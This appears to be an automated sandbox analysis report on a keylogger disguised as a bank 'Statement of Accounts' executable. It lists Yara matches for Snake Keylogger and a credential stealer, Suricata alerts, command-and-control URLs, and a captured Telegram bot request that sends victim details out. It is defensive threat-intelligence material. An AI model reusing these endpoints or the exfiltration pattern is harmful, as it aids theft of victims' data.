Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506013%0D%0ADate%20and%20Time:%2021/02/2025%20/%2013:36:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506013%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168
Source: Joe Sandbox View	IP Address: 104.21.96.1 104.21.96.1
Source: Joe Sandbox View	IP Address: 104.21.96.1 104.21.96.1

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49737 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49730 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49724 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49733 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49729 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49743 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49754 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49795 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49782 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49763 -> 104.21.96.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49726 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.168.2.5:49782 -> 104.21.96.1:443 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506013%0D%0ADate%20and%20Time:%2021/02/2025%20/%2013:36:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506013%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 21 Feb 2025 06:12:36 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003AD1000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003AD1000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003AD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003AD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000002.2209480776.00000000045CC000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003AD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003AD1000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013D99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003BE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003BE7000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003BE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003BE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506013%0D%0ADate%20a
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013D99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013D99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013D99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003C10000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003C8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003C94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en8
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003C8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=env
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013D99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013D99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013D99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003B43000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003BE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003B43000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003BE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013D99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013D99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003CC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/8
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003CBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/v

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49801 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 4676, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 5312, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

.NET source code contains very large strings

Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, Clock.cs

Long String: Length: 264295

Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Code function: 0_2_00007FF848CD27B2		0_2_00007FF848CD27B2
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Code function: 5_2_00007FF848CE874D		5_2_00007FF848CE874D

Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe

Static PE information: No import functions for PE file found

Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000002.2209303449.0000000003FA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameReactionDiffusion.dll0 vs [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAdelina.exe0 vs [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000002.2215485277.000000001EEF0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameGreenEnergy.dll@ vs [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000002.2211317194.00000000162A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameGreenEnergy.dll@ vs [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000002.2209480776.00000000045CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameReactionDiffusion.dll0 vs [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000002.2209480776.00000000045CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAdelina.exe0 vs [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000002.2215009073.000000001EB5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXE vs [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000002.2215009073.000000001EB5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowe4 vs [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000000.2151559394.0000000000EA2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameGcz.exe8 vs [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAdelina.exe0 vs [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Binary or memory string: OriginalFilenameGcz.exe8 vs [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe

Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
